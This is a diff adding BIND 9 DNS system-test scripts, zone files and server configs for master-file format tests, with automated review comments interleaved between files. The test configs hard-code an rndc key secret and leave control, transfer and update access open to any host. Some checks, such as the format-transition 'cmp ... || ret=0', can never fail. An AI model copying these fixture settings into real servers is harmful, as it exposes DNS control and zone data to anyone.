a/bin/tests/system/masterfile/setup.sh b/bin/tests/system/masterfile/setup.sh new file mode 100644 index 0000000..65fdd58 --- /dev/null +++ b/bin/tests/system/masterfile/setup.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf diff --git a/bin/tests/system/masterfile/tests.sh b/bin/tests/system/masterfile/tests.sh new file mode 100644 index 0000000..1948a69 --- /dev/null +++ b/bin/tests/system/masterfile/tests.sh 
@@ -0,0 +1,62 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" + +status=0 +n=0 + +ret=0 +n=`expr $n + 1` +echo_i "test master file \$INCLUDE semantics ($n)" +$DIG $DIGOPTS +nostats +nocmd include. axfr @10.53.0.1 >dig.out.$n + +echo_i "test master file BIND 8 compatibility TTL and \$TTL semantics ($n)" +$DIG $DIGOPTS +nostats +nocmd ttl2. axfr @10.53.0.1 >>dig.out.$n + +echo_i "test of master file RFC1035 TTL and \$TTL semantics ($n)" +$DIG $DIGOPTS +nostats +nocmd ttl2. axfr @10.53.0.1 >>dig.out.$n + +$DIFF dig.out.$n knowngood.dig.out || status=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +ret=0 +n=`expr $n + 1` +echo_i "test that the nameserver is running with a missing master file ($n)" +$DIG $DIGOPTS +tcp +noall +answer example soa @10.53.0.2 > dig.out.$n +grep SOA dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +ret=0 +n=`expr $n + 1` +echo_i "test that the nameserver returns SERVFAIL for a missing master file ($n)" +$DIG $DIGOPTS +tcp +all missing soa @10.53.0.2 > dig.out.$n +grep "status: SERVFAIL" dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +ret=0 +n=`expr $n + 1` +echo_i "test owner inheritance after "'$INCLUDE'" ($n)" +$CHECKZONE -Dq example zone/inheritownerafterinclude.db > checkzone.out$n +$DIFF checkzone.out$n zone/inheritownerafterinclude.good || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit 
status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/masterfile/zone/inheritownerafterinclude.db b/bin/tests/system/masterfile/zone/inheritownerafterinclude.db new file mode 100644 index 0000000..11b97ea --- /dev/null +++ b/bin/tests/system/masterfile/zone/inheritownerafterinclude.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 IN SOA . . 0 0 0 0 0 +$INCLUDE zone/nameservers.db + IN TXT "this should be at the zone apex" diff --git a/bin/tests/system/masterfile/zone/inheritownerafterinclude.good b/bin/tests/system/masterfile/zone/inheritownerafterinclude.good new file mode 100644 index 0000000..3877ed5 --- /dev/null +++ b/bin/tests/system/masterfile/zone/inheritownerafterinclude.good @@ -0,0 +1,3 @@ +example. 0 IN SOA . . 0 0 0 0 0 +example. 0 IN NS . +example. 0 IN TXT "this should be at the zone apex" diff --git a/bin/tests/system/masterfile/zone/nameservers.db b/bin/tests/system/masterfile/zone/nameservers.db new file mode 100644 index 0000000..f7b6525 --- /dev/null +++ b/bin/tests/system/masterfile/zone/nameservers.db @@ -0,0 +1,12 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ IN NS . 
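Review bot: The first check records a mismatch with `$DIFF dig.out.$n knowngood.dig.out || status=1` while the following `if [ $ret != 0 ]` tests `ret`, so a failed comparison is counted but never prints "failed"; `|| ret=1` would match the other three tests in the hunk. The two TTL steps both transfer `ttl2.`, so the `ttl1` zone that ns1/named.conf.in loads looks untested here, and it is worth confirming that this is intended. None of the three `axfr` calls has its exit status checked, which leaves the diff against knowngood.dig.out as the only signal when a transfer fails.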
diff --git a/bin/tests/system/masterformat/clean.sh b/bin/tests/system/masterformat/clean.sh new file mode 100755 index 0000000..c53c7ab --- /dev/null +++ b/bin/tests/system/masterformat/clean.sh @@ -0,0 +1,35 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ./ns1/example.db.raw* +rm -f ./ns1/example.db.compat +rm -f ./ns1/example.db.serial.raw +rm -f ./ns1/large.db ./ns1/large.db.raw +rm -f ./ns1/example.db.map ./ns1/signed.db.map +rm -f ./ns1/session.key +rm -f ./dig.out.* +rm -f ./dig.out +rm -f ./*/named.memstats +rm -f ./*/named.conf +rm -f ./*/named.run +rm -f ./ns2/example.db +rm -f ./ns2/transfer.db.* +rm -f ./ns2/formerly-text.db +rm -f ./ns2/db-* +rm -f ./ns2/large.bk +rm -f ./ns3/example.db.map ./ns3/dynamic.db.map +rm -f ./baseline.txt ./text.* ./raw.* ./map.* ./badmap +rm -f ./ns1/Ksigned.* ./ns1/dsset-signed. ./ns1/signed.db.signed +rm -f ./rndc.out +rm -f ./ns*/named.lock +rm -f ./ns*/managed-keys.bind* diff --git a/bin/tests/system/masterformat/ns1/compile.sh b/bin/tests/system/masterformat/ns1/compile.sh new file mode 100755 index 0000000..6626c17 --- /dev/null +++ b/bin/tests/system/masterformat/ns1/compile.sh 
@@ -0,0 +1,36 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+$CHECKZONE -D -F raw -o example.db.raw example \
+ example.db > /dev/null 2>&1
+$CHECKZONE -D -F map -o ../ns3/example.db.map example \
+ example.db > /dev/null 2>&1
+$CHECKZONE -D -F map -o ../ns3/dynamic.db.map dynamic \
+ example.db > /dev/null 2>&1
+$CHECKZONE -D -F raw=1 -o example.db.raw1 example-explicit \
+ example.db > /dev/null 2>&1
+$CHECKZONE -D -F raw=0 -o example.db.compat example-compat \
+ example.db > /dev/null 2>&1
+$CHECKZONE -D -F raw -L 3333 -o example.db.serial.raw example \
+ example.db > /dev/null 2>&1
+$CHECKZONE -D -F raw -o large.db.raw large large.db > /dev/null 2>&1
+$CHECKZONE -D -F map -o example.db.map example-map \
+ example.db > /dev/null 2>&1
+
+$KEYGEN -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK signed > /dev/null 2>&1
+$KEYGEN -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" signed > /dev/null 2>&1
+$SIGNER -S -f signed.db.signed -o signed signed.db > /dev/null
+$CHECKZONE -D -F map -o signed.db.map signed signed.db.signed > /dev/null 2>&1
diff --git a/bin/tests/system/masterformat/ns1/example.db b/bin/tests/system/masterformat/ns1/example.db
new file mode 100644
index 0000000..5ca0ae2
--- /dev/null
+++ b/bin/tests/system/masterformat/ns1/example.db
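Review bot: Every `$CHECKZONE` and `$KEYGEN` call in this script sends both stdout and stderr to `/dev/null` and none has its exit status checked, so a failed zone compilation or key generation is silent and only the last `$CHECKZONE` decides the script's exit code. Leaving stderr attached (dropping `2>&1`) and appending `|| exit 1` to each command would make the failing step visible to whoever calls the script. The script also sources `"$SYSTEMTESTTOP/conf.sh"` without setting `SYSTEMTESTTOP`, so it relies on the caller exporting it; a one-line comment above the `.` line saying so would help.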
@@ -0,0 +1,58 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 1D + +@ IN SOA ns hostmaster ( + 1 + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 +mx MX 10 mail +a A 10.53.0.1 + A 10.53.0.2 +aaaa AAAA 2001:db8::53 +cname CNAME cname-target +dname DNAME dname-target +txt TXT "this is text" + +;; +;; we are not testing DNSSEC behavior, so we don't care about the semantics +;; of the following records. +dnskey 300 DNSKEY 256 3 13 ( + TEcpWeW1mJp+OujqyInMbjGRODJIYen/4kMR + wO6zW3RzrvmNIMgFag6G uXofiSwJ6YDeQ0O + 3uhPJsJ7ivpbh+w== + ) +private-dnskey 300 DNSKEY 256 3 253 ( AAo= ) +ds 300 DS 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEA + A3B9 ) +cdnskey 300 CDNSKEY 256 3 13 ( + TEcpWeW1mJp+OujqyInMbjGRODJIYen/4kMR + wO6zW3RzrvmNIMgFag6G uXofiSwJ6YDeQ0O + 3uhPJsJ7ivpbh+w== + ) +private-cdnskey 300 CDNSKEY 256 3 253 ( AAo= ) +cds 300 CDS 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEA + A3B9 ) +nsec 600 NSEC nsecnext NS DS RRSIG NSEC +rrsig 300 RRSIG SOA 1 0 300 20050714214747 ( + 20050614214747 30795 . + yi/RRPAQmn6rnjDQaCqVValBa+ICF00ZldKf + ZSDaoew5mMUh83DlrrPPNeAxrzMSNzDGlJ6P + fdyIFgzPn/CvthF4kjBUAiJTp4r2zhlaUJQ+ + QFo+drYXYgVJo6aA36fj ) diff --git a/bin/tests/system/masterformat/ns1/large.db.in b/bin/tests/system/masterformat/ns1/large.db.in new file mode 100644 index 0000000..5a81863 --- /dev/null +++ b/bin/tests/system/masterformat/ns1/large.db.in 
@@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 1D + +@ IN SOA ns hostmaster ( + 1 + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 diff --git a/bin/tests/system/masterformat/ns1/named.conf.in b/bin/tests/system/masterformat/ns1/named.conf.in new file mode 100644 index 0000000..cc95655 --- /dev/null +++ b/bin/tests/system/masterformat/ns1/named.conf.in 
@@ -0,0 +1,87 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+options {
+ pid-file "named.pid";
+ listen-on port @PORT@ { 10.53.0.1; };
+ port @PORT@;
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+ session-keyfile "session.key";
+ servfail-ttl 0;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "example" {
+ type primary;
+ masterfile-format raw;
+ file "example.db.raw";
+};
+
+zone "compat-example" {
+ type primary;
+ masterfile-format raw;
+ file "example.db.compat";
+};
+
+zone "transfer1" {
+ type primary;
+ file "example.db";
+ allow-transfer { any; };
+};
+
+zone "transfer2" {
+ type primary;
+ file "example.db";
+ allow-transfer { any; };
+};
+
+zone "transfer3" {
+ type primary;
+ file "example.db";
+ allow-transfer { any; };
+};
+
+zone "transfer4" {
+ type primary;
+ file "example.db";
+ allow-transfer { any; };
+};
+
+
+zone "large" {
+ type primary;
+ file "large.db.raw";
+ masterfile-format raw;
+ allow-transfer { any; };
+};
+
+zone "signed" {
+ type primary;
+ file "signed.db.map";
+ masterfile-format map;
+ allow-transfer { any; };
+ update-policy local;
+ auto-dnssec maintain;
+};
diff --git a/bin/tests/system/masterformat/ns1/signed.db b/bin/tests/system/masterformat/ns1/signed.db
new file mode 100644
index 0000000..55d6fae
--- /dev/null
+++ b/bin/tests/system/masterformat/ns1/signed.db
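Review bot: The `key rndc_key` block in ns1/named.conf.in carries a literal secret, the `controls` statement accepts `allow { any; }`, and every transferable zone uses `allow-transfer { any; };`, yet nothing in the file marks these as test-only values. The same key and control ACL are repeated in ns3/named.conf.in, which also sets `allow-update { any; };` on the `dynamic` zone. On the 10.53.0.x test addresses this is presumably intentional, but fixture configs tend to get copied as templates. I would add a comment above the key in both files, such as `// Test fixture only: fixed rndc key and open ACLs; do not reuse outside the system-test network.`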
@@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 1D + +@ IN SOA ns hostmaster ( + 1 + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 +mx MX 10 mail +a A 10.53.0.1 + A 10.53.0.2 +aaaa AAAA 2001:db8::53 +cname CNAME cname-target +dname DNAME dname-target +txt TXT "this is text" diff --git a/bin/tests/system/masterformat/ns2/formerly-text.db.in b/bin/tests/system/masterformat/ns2/formerly-text.db.in new file mode 100644 index 0000000..02ce216 --- /dev/null +++ b/bin/tests/system/masterformat/ns2/formerly-text.db.in 
@@ -0,0 +1,48 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 86400 ; 1 day +transfer3 IN SOA ns.transfer3. hostmaster.transfer3. ( + 1 ; serial + 3600 ; refresh (1 hour) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3 ; minimum (3 seconds) + ) + NS ns.transfer3. +$ORIGIN transfer3. +a A 10.53.0.1 + A 10.53.0.2 +aaaa AAAA 2001:db8::53 +cname CNAME cname-target +dname DNAME dname-target +$TTL 300 ; 5 minutes +dnskey DNSKEY 256 3 13 ( + TEcpWeW1mJp+OujqyInMbjGRODJIYen/4kMR + wO6zW3RzrvmNIMgFag6G uXofiSwJ6YDeQ0O + 3uhPJsJ7ivpbh+w== + ) +ds DS 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 ) +$TTL 86400 ; 1 day +mx MX 10 mail +ns A 10.53.0.1 +$TTL 600 ; 10 minutes +nsec NSEC nsecnext.transfer3. NS DS RRSIG NSEC +$TTL 300 ; 5 minutes +rrsig RRSIG SOA 1 0 300 ( + 20050714214747 20050614214747 30795 . + yi/RRPAQmn6rnjDQaCqVValBa+ICF00ZldKfZSDaoew5 + mMUh83DlrrPPNeAxrzMSNzDGlJ6PfdyIFgzPn/CvthF4 + kjBUAiJTp4r2zhlaUJQ+QFo+drYXYgVJo6aA36fj ) +$TTL 86400 ; 1 day +txt TXT "this is text" diff --git a/bin/tests/system/masterformat/ns2/named.conf.in b/bin/tests/system/masterformat/ns2/named.conf.in new file mode 100644 index 0000000..c0f2987 --- /dev/null +++ b/bin/tests/system/masterformat/ns2/named.conf.in 
@@ -0,0 +1,63 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + pid-file "named.pid"; + listen-on port @PORT@ { 10.53.0.2; }; + listen-on-v6 { none; }; + port @PORT@; + recursion no; + notify no; + servfail-ttl 0; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "transfer1" { + type secondary; + primaries { 10.53.0.1; }; + file "transfer.db.raw"; +}; + +zone "transfer2" { + type secondary; + primaries { 10.53.0.1; }; + masterfile-format text; + file "transfer.db.txt"; +}; + +zone "transfer3" { + type secondary; + primaries { 10.53.0.1; }; + file "formerly-text.db"; +}; + +zone "transfer4" { + type secondary; + primaries { 10.53.0.1; }; + masterfile-format text; + masterfile-style full; + file "transfer.db.full"; +}; + +zone "large" { + type secondary; + primaries { 10.53.0.1; }; + masterfile-format raw; + file "large.bk"; +}; diff --git a/bin/tests/system/masterformat/ns3/named.conf.in b/bin/tests/system/masterformat/ns3/named.conf.in new file mode 100644 index 0000000..a41b7a8 --- /dev/null +++ b/bin/tests/system/masterformat/ns3/named.conf.in 
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS3
+
+options {
+ pid-file "named.pid";
+ listen-on port @PORT@ { 10.53.0.3; };
+ port @PORT@;
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "example" {
+ type primary;
+ masterfile-format map;
+ file "example.db.map";
+};
+
+zone "dynamic" {
+ type primary;
+ masterfile-format map;
+ file "dynamic.db.map";
+ allow-update { any; };
+};
diff --git a/bin/tests/system/masterformat/setup.sh b/bin/tests/system/masterformat/setup.sh
new file mode 100755
index 0000000..ba2605c
--- /dev/null
+++ b/bin/tests/system/masterformat/setup.sh
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+$SHELL clean.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+
+cp ns1/example.db ns2/
+cp ns2/formerly-text.db.in ns2/formerly-text.db
+cp ns1/large.db.in ns1/large.db
+awk 'END {
+ for (i = 0; i < 512; i++ ) { print "a TXT", i; }
+ for (i = 0; i < 1024; i++ ) { print "b TXT", i; }
+ for (i = 0; i < 2000; i++ ) { print "c TXT", i; }
+}' < /dev/null >> ns1/large.db
+cd ns1 && $SHELL compile.sh
diff --git a/bin/tests/system/masterformat/tests.sh b/bin/tests/system/masterformat/tests.sh
new file mode 100755
index 0000000..d78cf37
--- /dev/null
+++ b/bin/tests/system/masterformat/tests.sh
@@ -0,0 +1,357 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +status=0 +n=1 + +ismap () { + # shellcheck disable=SC2016 + $PERL -e 'binmode STDIN; + read(STDIN, $input, 8); + ($style, $version) = unpack("NN", $input); + exit 1 if ($style != 3 || $version > 1);' < "$1" + return $? +} + +israw () { + # shellcheck disable=SC2016 + $PERL -e 'binmode STDIN; + read(STDIN, $input, 8); + ($style, $version) = unpack("NN", $input); + exit 1 if ($style != 2 || $version > 1);' < "$1" + return $? +} + +isfull () { + # there should be no whitespace at the beginning of a line + if grep '^[ ][ ]*' "$1" > /dev/null 2>&1; then + return 1 + else + return 0 + fi +} + +rawversion () { + # shellcheck disable=SC2016 + $PERL -e 'binmode STDIN; + read(STDIN, $input, 8); + if (length($input) < 8) { print "not raw\n"; exit 0; }; + ($style, $version) = unpack("NN", $input); + print ($style == 2 || $style == 3 ? "$version\n" : + "not raw or map\n");' < "$1" +} + +sourceserial () { + # shellcheck disable=SC2016 + $PERL -e 'binmode STDIN; + read(STDIN, $input, 20); + if (length($input) < 20) { print "UNSET\n"; exit; }; + ($format, $version, $dumptime, $flags, $sourceserial) = + unpack("NNNNN", $input); + if ($format != 2 || $version < 1) { print "UNSET\n"; exit; }; + if ($flags & 02) { + print $sourceserial . 
"\n"; + } else { + print "UNSET\n"; + }' < "$1" +} + +stomp () { + # shellcheck disable=SC2016 + $PERL -e 'open(my $file, "+<", $ARGV[0]); + binmode $file; + seek($file, $ARGV[1], 0); + for (my $i = 0; $i < $ARGV[2]; $i++) { + print $file pack("C", $ARGV[3]); + } + close($file);' "$@" +} + +restart () { + sleep 1 + start_server --noclean --restart --port "${PORT}" ns3 +} + +dig_with_opts() { + "$DIG" +tcp +noauth +noadd +nosea +nostat +noquest +nocomm +nocmd -p "${PORT}" "$@" +} + +rndccmd() { + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "${CONTROLPORT}" -s "$@" +} + +status=0 + +echo_i "checking that files in raw format loaded ($n)" +ret=0 +set -- 1 2 3 +for zone in example example-explicit example-compat; do + for server in "$@"; do + for qname in ns mx a aaaa cname dname txt rrsig nsec \ + dnskey ds cdnskey cds; do + qtype="$qname" + dig_with_opts @10.53.0.${server} -q ${qname}.${zone}. -t ${qtype} + echo + done > dig.out.${zone}.${server}.test${n} + for qname in private-dnskey private-cdnskey; do + qtype=$(expr "$qname" : '.*-\(.*\)') + dig_with_opts @10.53.0.${server} -q ${qname}.${zone}. 
-t ${qtype} + done >> dig.out.${zone}.${server}.test${n} + done + digcomp dig.out.${zone}.1.test${n} dig.out.${zone}.2.test${n} || ret=1 + if [ "$zone" = "example" ]; then + set -- 1 2 + digcomp dig.out.${zone}.1.test${n} dig.out.${zone}.3.test${n} || ret=1 + fi +done +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking raw format versions ($n)" +ret=0 +israw ns1/example.db.raw || ret=1 +israw ns1/example.db.raw1 || ret=1 +israw ns1/example.db.compat || ret=1 +ismap ns1/example.db.map || ret=1 +[ "$(rawversion ns1/example.db.raw)" -eq 1 ] || ret=1 +[ "$(rawversion ns1/example.db.raw1)" -eq 1 ] || ret=1 +[ "$(rawversion ns1/example.db.compat)" -eq 0 ] || ret=1 +[ "$(rawversion ns1/example.db.map)" -eq 1 ] || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking source serial numbers ($n)" +ret=0 +[ "$(sourceserial ns1/example.db.raw)" = "UNSET" ] || ret=1 +[ "$(sourceserial ns1/example.db.serial.raw)" = "3333" ] || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "waiting for transfers to complete" +for i in 0 1 2 3 4 5 6 7 8 9 +do + test -f ns2/transfer.db.raw -a -f ns2/transfer.db.txt && break + sleep 1 +done + +echo_i "checking that secondary was saved in raw format by default ($n)" +ret=0 +israw ns2/transfer.db.raw || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that secondary was saved in text format when configured ($n)" +ret=0 +israw ns2/transfer.db.txt && ret=1 +isfull ns2/transfer.db.txt && ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that secondary was saved in 'full' style when configured ($n)" +ret=0 +isfull ns2/transfer.db.full > /dev/null 2>&1 || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that secondary formerly in text format is now raw ($n)" +for i in 0 1 2 3 4 5 6 7 8 9 +do + 
ret=0 + israw ns2/formerly-text.db > /dev/null 2>&1 || ret=1 + [ "$(rawversion ns2/formerly-text.db)" -eq 1 ] || ret=1 + [ $ret -eq 0 ] && break + sleep 1 +done +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that large rdatasets loaded ($n)" +for i in 0 1 2 3 4 5 6 7 8 9 +do +ret=0 +for a in a b c +do + $DIG +tcp txt "${a}.large" @10.53.0.2 -p "${PORT}" > "dig.out.ns2.test$n" + grep "status: NOERROR" "dig.out.ns2.test$n" > /dev/null || ret=1 +done +[ $ret -eq 0 ] && break +sleep 1 +done +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking format transitions: text->raw->map->text ($n)" +ret=0 +$CHECKZONE -D -f text -F text -o baseline.txt example.nil ns1/example.db > /dev/null +$CHECKZONE -D -f text -F raw -o raw.1 example.nil baseline.txt > /dev/null +$CHECKZONE -D -f raw -F map -o map.1 example.nil raw.1 > /dev/null +$CHECKZONE -D -f map -F text -o text.1 example.nil map.1 > /dev/null +cmp -s baseline.txt text.1 || ret=0 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking format transitions: text->map->raw->text ($n)" +ret=0 +$CHECKZONE -D -f text -F map -o map.2 example.nil baseline.txt > /dev/null +$CHECKZONE -D -f map -F raw -o raw.2 example.nil map.2 > /dev/null +$CHECKZONE -D -f raw -F text -o text.2 example.nil raw.2 > /dev/null +cmp -s baseline.txt text.2 || ret=0 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking map format loading with journal file rollforward ($n)" +ret=0 +$NSUPDATE <<END > /dev/null || status=1 +server 10.53.0.3 ${PORT} +ttl 600 +update add newtext.dynamic IN TXT "added text" +update delete aaaa.dynamic +send +END +dig_with_opts @10.53.0.3 newtext.dynamic txt > "dig.out.dynamic1.ns3.test$n" +grep "added text" "dig.out.dynamic1.ns3.test$n" > /dev/null 2>&1 || ret=1 +dig_with_opts +comm @10.53.0.3 added.dynamic txt > "dig.out.dynamic2.ns3.test$n" +grep "NXDOMAIN" 
"dig.out.dynamic2.ns3.test$n" > /dev/null 2>&1 || ret=1 +# using "rndc halt" ensures that we don't dump the zone file +stop_server --use-rndc --halt --port ${CONTROLPORT} ns3 +restart +check_added_text() { + dig_with_opts @10.53.0.3 newtext.dynamic txt > "dig.out.dynamic3.ns3.test$n" || return 1 + grep "added text" "dig.out.dynamic3.ns3.test$n" > /dev/null || return 1 + return 0 +} +retry_quiet 10 check_added_text || ret=1 +dig_with_opts +comm @10.53.0.3 added.dynamic txt > "dig.out.dynamic4.ns3.test$n" +grep "NXDOMAIN" "dig.out.dynamic4.ns3.test$n" > /dev/null 2>&1 || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking map format file dumps correctly ($n)" +ret=0 +$NSUPDATE <<END > /dev/null || status=1 +server 10.53.0.3 ${PORT} +ttl 600 +update add moretext.dynamic IN TXT "more text" +send +END +dig_with_opts @10.53.0.3 moretext.dynamic txt > "dig.out.dynamic1.ns3.test$n" +grep "more text" "dig.out.dynamic1.ns3.test$n" > /dev/null 2>&1 || ret=1 +# using "rndc stop" will cause the zone file to 